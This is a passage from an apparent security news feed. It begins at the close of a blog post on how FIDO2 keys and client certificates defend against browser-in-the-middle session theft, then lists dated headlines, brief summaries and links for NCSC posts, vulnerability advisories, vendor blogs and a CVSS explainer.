certificate to authenticate, and the attacker's site does not have one. Although the attacker's site mirrors the legitimate site's screen so it can trick a possible victim into authenticating for them, the attacker does not have a key or certificate, thus they cannot proceed and the authentication fails. Furthermore, the FIDO2 protocol ensures the BitM cannot successfully replay the FIDO2 response from the real user, as the browser on the user's machine would ensure the responses are immutably tied to the request's origin (i.e., the attacker site cannot request a FIDO2 response to a different target website). Figure 8: FIDO2 and certificate-based authentication with BitM There are some caveats with the aforementioned scenario that are important to point out. Certificate-based authentication and FIDO2 security keys only protect sessions when the device they are hosted on is not compromised. It is possible to compromise sessions, and even phish sessions, that are protected with FIDO2 security keys and certificates if you are able to compromise the device they are connected to. This should underscore the importance of a layered security approach with all applications that host sensitive data or provide access to restricted networks. Conclusion The threat of BitM attacks emphasizes the importance of robust authentication and access-control mechanisms. By adopting a multi-layered defense strategy incorporating client certificates, hardware-based MFA solutions such as FIDO2-compatible security keys, and compensating controls, organizations can significantly enhance their resilience against these sophisticated threats. The integration of security keys into this defense strategy provides a particularly effective safeguard against session stealing, offering users a tangible and reliable way to protect their online identities and sensitive data. Acknowledgements A very special thanks to everyone who contributed to this project's early and continued development. This blog post was made possible by Chris King, Evan Peña, Jerry McClurg, and Jeff Hoffmann.

https://cloud.google.com/blog/topics/threat-intelligence/session-stealing-browser-in-the-middle/
Securing retail’s digital edge: How SASE protects trust & drives competitive advantage
2025-03-16T12:55:24Z | 1742129724

The post Securing retail’s digital edge: How SASE protects trust & drives competitive advantage  appeared first on Cato Networks.

https://www.catonetworks.com/resources/securing-retails-digital-edge/
2025-011: Critical Vulnerabilities in Gitlab
2025-03-14T17:03:26Z | 1741971806

On March 13, 2025, GitLab released security updates for Community Edition (CE) and Enterprise Edition (EE), addressing nine vulnerabilities, including two critical severity flaws in the "ruby-saml" library used for SAML Single Sign-On (SSO) authentication. It is recommended updating affected assets as soon as possible.

https://cert.europa.eu/publications/security-advisories/2025-011/
2025-010: Critical Vulnerability in Cisco IOS XR Software
2025-03-14T17:02:50Z | 1741971770

On March 13, 2025, CISCO released an advisory regarding a critical vulnerability identified in Cisco’s IOS XR Software. It is recommended updating affected assets as soon as possible.

https://cert.europa.eu/publications/security-advisories/2025-010/
Robots Refresher: page-level granularity
2025-03-14T14:30:00Z | 1741962600

With the robots.txt file, site owners have a simple way to control which parts of a website are accessible by crawlers. To help site owners further express how search engines and web crawlers can use their pages, the web standards group came up with robots meta tags in 1996, just a few months after meta tags were proposed for HTML (and anecdotally, also before Google was founded). Later, X-Robots-Tag HTTP response headers were added. These instructions are sent together with a URL, so crawlers can only take them into account if they're not disallowed from crawling the URL through the robots.txt file. Together, they form the Robots Exclusion Protocol (REP).

https://developers.google.com/search/blog/2025/03/robots-refresher-page-level
When IT meets OT: Cybersecurity for the physical world
2025-03-14T10:00:00Z | 1741946400

While relatively rare, real-world incidents impacting operational technology highlight that organizations in critical infrastructure can’t afford to dismiss the OT threat

https://www.welivesecurity.com/en/critical-infrastructure/when-it-meets-ot-cybersecurity-physical-world/
Negative Exposure: Edimax Network Cameras Used to Spread Mirai
2025-03-13T19:00:00Z | 1741892400

Mirai continues to plague organizations. Read how the Akamai SIRT identified a new command injection vulnerability that?s targeting Edimax devices.

https://www.akamai.com/blog/security-research/2025/mar/march-edimax-cameras-command-injection-mirai
Vereinfachung von DPDPA für indische Unternehmen mit Skyhigh Security
2025-03-13T14:27:44Z | 1741876064

The Digital Personal Data Protection Act (DPDPA) of 2023 marks a pivotal milestone in India’s data protection journey. Designed to... The post Simplifying DPDPA for Indian Enterprises with Skyhigh Security appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/simplifying-dpdpa-for-indian-enterprises-with-skyhigh-security.html
The Evolving State of Audio Processing in Lawful Intelligence
2025-03-13T13:21:49Z | 1741872109

Lawful interception of voice by LEAs harkens back to a time when unencrypted phone calls over a wireline carrier network defined electronic communication. In the smartphone era, other methods have proliferated. The post The Evolving State of Audio Processing in Lawful Intelligence appeared first on SS8.

https://www.ss8.com/the-evolving-state-of-audio-processing-in-lawful-intelligence/
Banking Data Breaches: The Fraud You Didn’t See Coming
2025-03-13T12:39:52Z | 1741869592

Your customers are panicking. Unauthorized transactions have drained accounts, credit card charges are piling up, and fraud alerts are triggering across multiple banking systems. Your security team scrambles to assess the damage, but the attackers are already steps ahead. How did this happen? To truly understand, we...

https://www.netscout.com/blog/banking-data-breaches-fraud-you-didnt-see-coming
Thinking about the security of AI systems
2025-03-13T12:05:36Z | 1741867536

Why established cyber security principles are still important when developing or implementing machine learning models.

https://www.ncsc.gov.uk/blog-post/thinking-about-security-ai-systems
There's a hole in my bucket
2025-03-13T12:02:33Z | 1741867353

...or 'Why do people leave sensitive data in unprotected AWS S3 buckets?'

https://www.ncsc.gov.uk/blog-post/theres-hole-my-bucket
The problems with patching
2025-03-13T12:00:51Z | 1741867251

Applying patches may be a basic security principle, but that doesn't mean it's always easy to do in practice.

https://www.ncsc.gov.uk/blog-post/the-problems-with-patching
The strength of the ICS COI is the team
2025-03-13T11:57:48Z | 1741867068

Join the Industrial Control System Community of Interest (ICS COI), and help build CNI expertise across the UK.

https://www.ncsc.gov.uk/blog-post/strength-of-ics-coi-is-the-team
The security benefits of modern collaboration in the cloud
2025-03-13T11:53:20Z | 1741866800

By exploiting cloud services, organisations no longer have to choose between ‘more security’ and ‘better usability’.

https://www.ncsc.gov.uk/blog-post/the-security-benefits-of-modern-collaboration-in-the-cloud
The problems with forcing regular password expiry
2025-03-13T11:50:53Z | 1741866653

Why the NCSC decided to advise against this long-established security guideline.

https://www.ncsc.gov.uk/blog-post/problems-forcing-regular-password-expiry
The logic behind three random words
2025-03-13T11:50:30Z | 1741866630

Whilst not a password panacea, using 'three random words' is still better than enforcing arbitrary complexity requirements.

https://www.ncsc.gov.uk/blog-post/the-logic-behind-three-random-words
The future of Technology Assurance in the UK
2025-03-13T11:43:13Z | 1741866193

Chris Ensor highlights some important elements of the NCSC's new Technology Assurance strategy.

https://www.ncsc.gov.uk/blog-post/future-of-technology-assurance-in-the-uk
NCSC joins partners to issue warning about China state-sponsored cyber activity targeting CNI networks
2025-03-13T11:31:13Z | 1741865473

The advisory provides technical indicators of compromise and examples of techniques deployed by the actor to help network defenders identify malicious activity.

https://www.ncsc.gov.uk/news/ncsc-joins-partners-to-issue-warning-about-chinese-cyber-activity-targeting-cni
The Cyber Assessment Framework 3.1
2025-03-13T11:30:06Z | 1741865406

Latest version of the CAF focusses on clarification and consistency between areas of the CAF.

https://www.ncsc.gov.uk/blog-post/the-cyber-assessment-framework-3-1
Thanking the vulnerability research community with NCSC Challenge Coins
2025-03-13T11:29:43Z | 1741865383

Reflecting on the positive impact of the Vulnerability Reporting Service – and introducing something new for selected contributors.

https://www.ncsc.gov.uk/blog-post/thanking-vulnerability-research-community-ncsc-challenge-coins
NCSC joins industry to offer unprecedented protection for public from scams
2025-03-13T11:27:11Z | 1741865231

Data sharing collaboration will allow ISPs to instantly block access to fraudulent sites.

https://www.ncsc.gov.uk/news/ncsc-joins-industry-to-offer-unprecedented-protection-for-public-from-scams
NCSC issues fresh guidance following recent rise in supply chain cyber attacks
2025-03-13T11:26:51Z | 1741865211

Guidance to help organisations assess the cyber security of their suppliers.

https://www.ncsc.gov.uk/news/ncsc-issues-fresh-guidance-following-recent-rise-in-supply-chain-cyber-attacks
NCSC enters new partnership for PDNS delivery
2025-03-13T11:26:37Z | 1741865197

The National Cyber Security Centre announces new partnership to deliver the Protective Domain Name System (PDNS) service.

https://www.ncsc.gov.uk/news/ncsc-new-pdns-partnership
NCSC Cyber Incident Response scheme now available to more organisations
2025-03-13T11:26:17Z | 1741865177

Help investigating and recovering from cyber attack now available from a larger pool of assured providers.

https://www.ncsc.gov.uk/news/ncsc-cyber-incident-response-scheme-available-more-organisations
NCSC consolidates advice on secure home learning
2025-03-13T11:25:59Z | 1741865159

Three tailored blogs to help manage remote education technology safely.

https://www.ncsc.gov.uk/news/ncsc-consolidates-advice-on-secure-home-learning
NCSC CEO shares insights into securing UK elections in cyber space at major international conference
2025-03-13T11:24:22Z | 1741865062

Felicity Oswald shares reflections on the UK approach to election security at Black Hat USA conference.

https://www.ncsc.gov.uk/news/ncsc-ceo-shares-insights-international-conference
Terminology: it's not black and white
2025-03-13T11:24:19Z | 1741865059

The NCSC now uses 'allow list' and 'deny list' in place of 'whitelist' and 'blacklist'. Emma W explains why...

https://www.ncsc.gov.uk/blog-post/terminology-its-not-black-and-white
NCSC CEO meets with cyber security leaders in India
2025-03-13T11:23:59Z | 1741865039

Lindy Cameron’s visit included discussions with academics, businesses and government representatives in India.

https://www.ncsc.gov.uk/news/ncsc-ceo-meets-with-cyber-security-leaders-in-india
Telling users to ‘avoid clicking bad links’ still isn’t working
2025-03-13T11:22:25Z | 1741864945

Why organisations should avoid ‘blame and fear’, and instead use technical measures to manage the threat from phishing.

https://www.ncsc.gov.uk/blog-post/telling-users-to-avoid-clicking-bad-links-still-isnt-working
Tackling the 'human factor' to transform cyber security behaviours
2025-03-13T11:22:06Z | 1741864926

ThinkCyber's CEO Tim Ward reflects on the challenges that startups face when developing innovative products.

https://www.ncsc.gov.uk/blog-post/tackling-human-factor-transform-cyber-security-behaviours
NCSC CEO Lindy Cameron urges UK organisations to take action
2025-03-13T11:12:06Z | 1741864326

An article in The Sunday Telegraph outlines guidance and information from the NCSC on actions to take when the cyber threat is heightened.

https://www.ncsc.gov.uk/news/ncsc-ceo-lindy-cameron-urges-uk-organisations-to-take-action
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 10/2025
2025-03-13T10:02:10Z | 1741860130

This week, we cover topics such as scam messages leading to Facebook account breaches, the Finnish InfoSec 2025 seminar on 12 March, and how to manage passwords securely.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-102025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 10/2025
2025-03-13T10:02:10Z | 1741860130

This week, we cover topics such as scam messages leading to Facebook account breaches, the Finnish InfoSec 2025 seminar on 12 March, and how to manage passwords securely.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-102025
Best Checkmarx Alternatives for Mobile Application Security | Appknox
2025-03-13T09:58:33Z | 1741859913

Checkmarx is a popular SAST, DAST, and SCA provider that helps organizations detect and fix vulnerabilities and ensure application security. Its robust testing capabilities make it a go-to choice for many enterprises looking to integrate security into their DevSecOps pipeline.

https://www.appknox.com/blog/top-checkmarx-alternatives
ESG Watch | March 2025
2025-03-13T08:38:41Z | 1741855121

Key news in this edition: EU proposes ESG Omnibus to streamline sustainability rules. The People’s Pension reallocates GBP 28 billion from State Street, citing ESG priorities. Companies recalibrate ESG targets in response to changing regulations and climate policies. Editorial Recent shifts in ESG regulations and investment strategies are reshaping corporate and financial landscapes globally, with notable changes in Europe and the US indicating a move towards reduced ESG commitments and more relaxed regulatory frameworks. In the EU, the proposed ESG Simplification Omnibus aims to streamline sustainability regulations by reducing the compliance burden on businesses. While this could foster economic growth, industry observers warn that scaling back mandatory sustainability disclosures may weaken ESG reporting's overall impact. Meanwhile, in the UK, The People’s Pension's decision to reallocate GBP 28 billion from State Street to Amundi and Invesco highlights the growing divergence between asset managers and long-term investors regarding climate commitments. The move was partly prompted by State Street’s withdrawal from the Climate Action 100+ coalition, demonstrating the increasing weight of ESG considerations in investment decisions, despite political headwinds in the US. These political shifts are evident in the US, where the new administration’s policy rollbacks have prompted several companies to adjust their ESG targets. Major financial institutions, such as Wells Fargo, and corporate giants like Ingka Group (IKEA), have recalibrated sustainability goals in response to changing regulatory landscapes. The uncertainty surrounding long-term policy direction indicates that companies must find a balance between adapting to regulatory changes and meeting stakeholder expectations when managing their ESG commitments. At the same time, new players are entering the ESG space. The Tadawul, Saudi Arabia’s stock exchange, recently listed its first sustainable ETF, signalling growing regional interest in sustainable finance. This aligns with global trends that indicate ESG’s increasing mainstream adoption, particularly in emerging markets seeking to attract international investors through enhanced transparency and reporting standards. Similarly, Thailand's government has introduced reforms to boost ESG investment, including tax incentives for transitioning to sustainable funds. This shows a broader trend of emerging markets aligning with global ESG standards to attract investment through enhanced transparency and reporting. As policies and regulatory landscapes evolve, sustainability continues to be a key focus for investors and businesses. As a result, companies must stay vigilant and monitor ESG developments to manage emerging risks and seize new opportunities.

https://www.s-rminform.com/esg-watch/esg-watch-march-2025
Supplier assurance: having confidence in your suppliers
2025-03-13T08:36:59Z | 1741855019

Questions to ask your suppliers that will help you gain confidence in their cyber security.

https://www.ncsc.gov.uk/blog-post/supplier-assurance-having-confidence-in-your-suppliers
Studies in secure system design
2025-03-13T08:36:36Z | 1741854996

Worked examples for Operational Technology and Virtualised systems, using the NCSC’s secure design principles

https://www.ncsc.gov.uk/blog-post/studies-in-secure-system-design
Spotlight on shadow IT
2025-03-13T08:35:58Z | 1741854958

New guidance to help organisations manage rogue devices and services within the enterprise.

https://www.ncsc.gov.uk/blog-post/spotlight-on-shadow-it
Smart devices: new law helps citizens to choose secure products
2025-03-13T08:29:58Z | 1741854598

Download the NCSC’s point-of-sale leaflet explaining how new PSTI regulation affects consumers and retailers.

https://www.ncsc.gov.uk/blog-post/smart-devices-law
SCADA 'in the cloud': new guidance for OT organisations
2025-03-13T08:28:01Z | 1741854481

If migrating SCADA solutions to the cloud, cyber security must be a key consideration for operational technology organisations.

https://www.ncsc.gov.uk/blog-post/scada-cloud-new-guidance-ot-organisations
SBOMs and the importance of inventory
2025-03-13T08:27:29Z | 1741854449

Can a Software Bill of Materials (SBOM) provide organisations with better insight into their supply chains?

https://www.ncsc.gov.uk/blog-post/sboms-and-the-importance-of-inventory
RITICS: Securing cyber-physical systems
2025-03-13T08:23:45Z | 1741854225

Discover the Research Institute in Trustworthy Inter-connected Cyber-physical Systems.

https://www.ncsc.gov.uk/blog-post/ritics-securing-cyber-physical-systems
Revolutionising identity services using AI
2025-03-13T08:23:25Z | 1741854205

The ‘NCSC for Startups’ alumnus giving identity verification the 'Trust Stamp'

https://www.ncsc.gov.uk/blog-post/revolutionising-identity-services-using-ai
Researching the hard problems in hardware security
2025-03-13T08:12:12Z | 1741853532

Introducing the next chapter of the NCSC research problem book, which aims to inspire research on the biggest impact topics in hardware cyber security.

https://www.ncsc.gov.uk/blog-post/introducing-hardware-security-problem-book
Relaunching the NCSC's Cloud security guidance collection
2025-03-13T08:11:33Z | 1741853493

Andrew A explains what's new in a significant update to the NCSC's flagship cloud guidance.

https://www.ncsc.gov.uk/blog-post/relaunching-the-ncscs-cloud-security-guidance-collection
Refreshed 'cyber security toolkit' helps board members to govern online risk
2025-03-13T08:07:39Z | 1741853259

Lindy Cameron, CEO, introduces changes to the NCSC’s cyber security resources specifically designed for board members.

https://www.ncsc.gov.uk/blog-post/refreshed-toolkit-helps-board-members-to-govern-cyber-risk
Ransomware and the cyber crime ecosystem
2025-03-13T08:07:11Z | 1741853231

A new white paper examines the rise of 'ransomware as a service' and extortion attacks.

https://www.ncsc.gov.uk/blog-post/ransomware-cyber-crime-ecosystem
Raising the cyber resilience of software 'at scale'
2025-03-13T08:05:15Z | 1741853115

New ‘Code of Practice for Software Vendors’ will ensure that security is fundamental to developing and distributing products and services.

https://www.ncsc.gov.uk/blog-post/raising-cyber-resilience-software-at-scale
QR Codes - what's the real risk?
2025-03-13T08:03:34Z | 1741853014

How safe is it to scan that QR code in the pub? Or in that email?

https://www.ncsc.gov.uk/blog-post/qr-codes-whats-real-risk
Protecting how you administer cloud services
2025-03-13T08:00:38Z | 1741852838

New advice on implementing high-risk and ‘break-glass’ accesses in cloud services.

https://www.ncsc.gov.uk/blog-post/protecting-how-you-administer-cloud-services
Protecting PBX from cyber attacks
2025-03-13T07:58:45Z | 1741852725

Why small organisations need to manage their private branch exchange (PBX) telephone networks.

https://www.ncsc.gov.uk/blog-post/protecting-pbx-from-cyber-attacks
Protecting parked domains for the UK public sector
2025-03-13T07:57:55Z | 1741852675

Non-email sending (parked) domains can be used to generate spam email, but they're easy to protect.

https://www.ncsc.gov.uk/blog-post/protecting-parked-domains
Protecting internet-facing services on public service CNI
2025-03-13T07:57:06Z | 1741852626

How operators of critical national infrastructure (CNI) can use NCSC guidance and blogs to secure their internet-facing services.

https://www.ncsc.gov.uk/blog-post/protecting-internet-facing-services-public-service-cni
Protect your management interfaces
2025-03-13T07:55:47Z | 1741852547

Why it's important to protect the interfaces used to manage your infrastructure, and some recommendations on how you might do this.

https://www.ncsc.gov.uk/blog-post/protect-your-management-interfaces
Protect your customers to protect your brand
2025-03-13T07:55:17Z | 1741852517

New guidance to protect your brand from being exploited online, and to help you choose alternate authentication models.

https://www.ncsc.gov.uk/blog-post/protect-your-customers-to-protect-your-brand
Products on your perimeter considered harmful (until proven otherwise)
2025-03-13T07:54:29Z | 1741852469

As attackers' tactics change, so must network defenders'.

https://www.ncsc.gov.uk/blog-post/products-on-your-perimeter
Principles and how they can help us with assurance
2025-03-13T07:54:03Z | 1741852443

Explaining the forthcoming NCSC Technology Assurance Principles.

https://www.ncsc.gov.uk/blog-post/principles-and-how-they-can-help-us-with-assurance
Preparing for the long haul: the cyber threat from Russia
2025-03-13T07:52:23Z | 1741852343

Although the UK has not experienced severe cyber attacks in relation to Russia’s invasion of Ukraine, now is not the time for complacency.

https://www.ncsc.gov.uk/blog-post/preparing-the-long-haul-the-cyber-threat-from-russia
Post-quantum cryptography: what comes next?
2025-03-13T07:51:51Z | 1741852311

Jeremy B explains how the NCSC will help organisations plan their migration to PQC.

https://www.ncsc.gov.uk/blog-post/post-quantum-cryptography-what-comes-next
Pathways: exploring a new way to achieve Cyber Essentials certification
2025-03-13T07:50:57Z | 1741852257

For large, complex firms struggling with the prescriptiveness of Cyber Essentials, ‘Pathways’ will provide a new route to certification.

https://www.ncsc.gov.uk/blog-post/pathways-achieve-cyber-essentials-certification
Our new principles to help make cloud backups more resilient
2025-03-13T07:45:49Z | 1741851949

Introducing a new set of NCSC principles to strengthen the resilience of organisations' cloud backups from ransomware attackers.

https://www.ncsc.gov.uk/blog-post/new-principles-make-cloud-backups-more-resilient
Offline backups in an online world
2025-03-13T07:45:04Z | 1741851904

How to protect your backups that are stored in the public cloud.

https://www.ncsc.gov.uk/blog-post/offline-backups-in-an-online-world
CVE-2025-24053 Microsoft Dataverse Elevation of Privilege Vulnerability
2025-03-13T07:00:00Z | 1741849200

Improper authentication in Microsoft Dataverse allows an authorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24053
ZDI-25-130: Siemens Simcenter Femap NEU File Parsing Memory Corruption Remote Code Execution Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Siemens Simcenter Femap. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-25175.

http://www.zerodayinitiative.com/advisories/ZDI-25-130/
ZDI-25-131: Adobe Acrobat Reader DC Annotation Use-After-Free Remote Code Execution Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-27160.

http://www.zerodayinitiative.com/advisories/ZDI-25-131/
ZDI-25-132: Adobe Acrobat Reader DC Annotation Use-After-Free Remote Code Execution Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-27159.

http://www.zerodayinitiative.com/advisories/ZDI-25-132/
ZDI-25-133: Adobe Acrobat Reader DC Annotation Use-After-Free Remote Code Execution Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-27174.

http://www.zerodayinitiative.com/advisories/ZDI-25-133/
ZDI-25-134: Adobe Acrobat Reader DC Doc Object Out-Of-Bounds Read Remote Code Execution Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-24431.

http://www.zerodayinitiative.com/advisories/ZDI-25-134/
ZDI-25-135: Adobe Acrobat Reader DC AcroForm Use of Uninitialized Variable Remote Code Execution Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-27162.

http://www.zerodayinitiative.com/advisories/ZDI-25-135/
ZDI-25-136: X.Org Server SyncInitTrigger Use-After-Free Local Privilege Escalation Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows local attackers to escalate privileges on affected installations of X.Org Server. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-26601.

http://www.zerodayinitiative.com/advisories/ZDI-25-136/
ZDI-25-137: X.Org Server PlayReleasedEvents Use-After-Free Local Privilege Escalation Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows local attackers to escalate privileges on affected installations of X.Org Server. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-26600.

http://www.zerodayinitiative.com/advisories/ZDI-25-137/
ZDI-25-138: X.Org Server compRedirectWindow Type Confusion Local Privilege Escalation Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows local attackers to escalate privileges on affected installations of X.Org Server. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-26599.

http://www.zerodayinitiative.com/advisories/ZDI-25-138/
ZDI-25-139: X.Org Server CreatePointerBarrierClient Out-Of-Bounds Write Local Privilege Escalation Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows local attackers to escalate privileges on affected installations of X.Org Server. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-26598.

http://www.zerodayinitiative.com/advisories/ZDI-25-139/
ZDI-25-140: X.Org Server XkbChangeTypesOfKey Heap-based Buffer Overflow Privilege Escalation Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows local attackers to escalate privileges on affected installations of X.Org Server. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-26597.

http://www.zerodayinitiative.com/advisories/ZDI-25-140/
ZDI-25-141: X.Org Server XkbSizeKeySyms Heap-based Buffer Overflow Privilege Escalation Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows local attackers to escalate privileges on affected installations of X.Org Server. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-26596.

http://www.zerodayinitiative.com/advisories/ZDI-25-141/
ZDI-25-142: X.Org Server XkbVModMaskText Stack-based Buffer Overflow Privilege Escalation Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows local attackers to escalate privileges on affected installations of X.Org Server. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-26595.

http://www.zerodayinitiative.com/advisories/ZDI-25-142/
ZDI-25-143: X.Org Server ChangeWindowAttributes Use-After-Free Privilege Escalation Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows local attackers to escalate privileges on affected installations of X.Org Server. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-26594.

http://www.zerodayinitiative.com/advisories/ZDI-25-143/
ZDI-25-144: NVIDIA Riva gRPC API Missing Authentication for Critical Function Authentication Bypass Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows remote attackers to bypass authentication on affected installations of NVIDIA Riva. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-23243.

http://www.zerodayinitiative.com/advisories/ZDI-25-144/
ZDI-25-145: NVIDIA Riva Triton Inference Server Missing Authentication Vulnerability
2025-03-13T05:00:00Z | 1741842000

This vulnerability allows remote attackers to access protected functionality on affected installations of NVIDIA Riva. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2025-23242.

http://www.zerodayinitiative.com/advisories/ZDI-25-145/
Security Alert (A25-03-15): Vulnerability in Juniper Networks Junos OS
2025-03-13T04:00:00Z | 1741838400

Juniper Networks has published security advisory to address vulnerability in Junos OS.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-03-16): Multiple Vulnerabilities in Microsoft Edge
2025-03-13T04:00:00Z | 1741838400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-03-17): Multiple Vulnerabilities in Cisco Products
2025-03-13T04:00:00Z | 1741838400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
AWS SNS Abuse: Data Exfiltration and Phishing
2025-03-13T00:00:00Z | 1741824000

During a recent internal collaboration, we dug into publicly known SNS abuse attempts and our knowledge of the data source to develop detection capabilities.

https://www.elastic.co/security-labs/aws-sns-abuse
Rapid Response in Action: How Vectra AI Thwarted a Zero-Day Threat by Lucie Cardiet
2025-03-13T00:00:00Z | 1741824000

A concise, real-world case study showcasing agile incident response and tailored threat detection for the modern network.

https://www.vectra.ai/blog/rapid-response-in-action-how-vectra-ai-thwarted-a-zero-day-threat
Why the Common Vulnerability Scoring System (CVSS) Is Necessary – But Also Insufficient
2025-03-12T19:46:33Z | 1741808793

Measuring the risks posed by vulnerabilities — to the greatest degree of accuracy — is no simple task. It’s common for organizations to use the Common Vulnerability Scoring System (CVSS) by default, to come to terms with the size and scope of vulnerabilities. But while CVSS is a useful tool, it’s not immune from its own vulnerabilities. How does vulnerability scoring work? Vulnerability scoring systems are tools used to determine the risk associated with software or system vulnerabilities. The numerical score helps IT and security teams know how and where to direct their resources to get in front of potential risks. Vulnerability scoring takes into account factors such as the complexity of exploiting a vulnerability, the potential impact on the affected systems and whether administrative access or user interaction is required for an attack to succeed. CVSS is among multiple scoring method frameworks, though it has become the industry-leading one. That’s because it introduces a high degree of consistency in communication about vulnerabilities. What is the Common Vulnerability Scoring System (CVSS)? CVSS has emerged as the go-to method for calculating the severity of vulnerabilities. The idea is to standardize how stakeholders assess and rank vulnerabilities based on a numerical scale from 0 to 10. What factors are considered in CVSS? CVSS assigns significance to vulnerabilities across the enterprise infrastructure using several criteria, such as: Attack vector: What’s the source of the vulnerability? For instance, does it exist locally on the machine, remotely across a network or is another context at play? Access complexity: How difficult or complex is the exploitation process? Authentication: Is user authentication necessary for the exploitation to take hold? Impact: How might the threat impinge on system confidentiality, integrity or availability? User interaction: Does the event require a user to take action, such as clicking on a link in a phishing email? Each of these domains is assigned scores. Then they’re aggregated to generate an overall CVSS severity rating.   CVSS nomenclature CVSS scores are commonly categorized into severity levels: Low (0.1–3.9): Minor risk, with slight potential for detriment. Medium (4.0–6.9): Indicative of moderate risks that should be acted on. High (7.0–8.9): Serious vulnerabilities that necessitate prompt action. Critical (9.0–10): Vulnerabilities with high urgency due to grave potential for extensive exploitation. Are there other vulnerability scoring systems? Other vulnerability scoring approaches like the Exploit Prediction Scoring System (EPSS) exist. The reality is, however, that no one has enjoyed broad adoption like CVSS has. Where vulnerability scoring systems fall short It’s true that CVSS provides a basic assessment of vulnerabilities. Unfortunately, it’s lacking on several fronts, which makes it insufficient when used alone. Static scoring and blind spots One area where CVSS falls short is that it uses a static, fixed scoring model. The system assigns a severity score when a vulnerability is first identified. This score never updates, despite when circumstances change. As you might imagine, this is flawed because a vulnerability classified as “low” today may transition to a higher priority in the future. Put simply, CVSS only captures a picture in time and doesn’t account for changes in the landscape. For example, a “5.0” medium score may seem insignificant at first blush. Further down the road, if an exploit is discovered and escalates, the inherent risk increases drastically. Without the benefit of additional context, decision-makers may misproritize a vulnerability. What is risk context? Another potential shortfall of CVSS is that it may not adjust for the specific operational environment or risk context of an organization. The risk of a vulnerability is often dependent on the organization and context. For instance, a vulnerability on a public-facing server at a bank will present a greater risk than the same vulnerability on an internal server used by a few people in a department. A “low-severity” vulnerability could be disastrous for organizations that handle sensitive data, such as hospitals. The potential to expose healthcare records carries a higher regulatory risk than other kinds of leaked customer data. The regulatory context informs the elevated organizational risk. Put simply, risk context matters. Each applicable vulnerability must be judged in the appropriate organizational and usage context — potentially folding into broader risk management efforts for the organization. Calculating vulnerability scores CVSS falls short in prioritization, as brought to life by this example: A CVSS score of 5.0 could suggest moderate severity. Basing a decision on this static number alone could cause a vulnerability to be prematurely dismissed. The vulnerability 